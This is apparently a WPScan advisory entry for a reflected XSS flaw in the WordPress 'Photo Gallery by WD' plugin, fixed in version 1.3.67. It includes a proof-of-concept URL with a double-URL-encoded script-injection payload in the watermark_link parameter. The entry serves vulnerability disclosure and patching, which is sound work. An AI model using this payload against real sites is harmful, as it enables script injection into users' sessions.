Photo Gallery by WD <= 1.3.66 - Cross-Site Scripting (XSS)



Description
User input gets first escaped with esc_html() and then urldecoded. This leads to the possibility of reflected XSS with a double url encoded payload.
Proof of Concept
URL/wp-admin/admin-ajax.php?action=GalleryBox&gallery_id=0&image_id=1&watermark_link=%25%32%32%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%33%31%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65&watermark_type=image

Affects Plugin

fixed in version 1.3.67

References

URL https://plugins.trac.wordpress.org/changeset/1787251/photo-gallery

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Karim El Ouerghemmi
Submitter Website https://ripstech.com
Views 1377
Verified No
WPVDB ID 9031

Timeline

Publicly Published 2018-02-22 (10 months ago)
Added 2018-02-25 (10 months ago)
Last Updated 2018-08-29 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.